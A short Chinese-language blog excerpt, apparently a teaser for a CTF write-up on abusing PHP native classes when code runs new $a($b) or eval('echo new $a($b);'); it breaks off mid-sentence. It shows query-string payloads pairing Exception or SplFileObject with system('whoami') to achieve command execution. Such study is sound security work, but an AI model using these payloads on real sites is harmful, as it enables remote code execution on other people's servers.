内容简介：

 
前言
最近打了一个比赛遇到了以new $a($b)这样的考点,结合以前了解的知识,所以总结一下几种类似形式的解题技巧
这里主要以下三种形式的代码
​ eval(“echo new $a($b);”)
​ echo new $a($b)
​ new $a($b)
 
eval(“echo new $a($b);”)
首先来看第一种
这个形式的代码相对简单,我们只需要给a随便传⼀个原⽣类，给b传恶意命令即可：
?a=Exception&b=system('whoami')
?a=SplFileObject&b=system('whoami')

然后我们来看第二种,也是比...

查看原文

? PHP原生类在安全方面的利用总结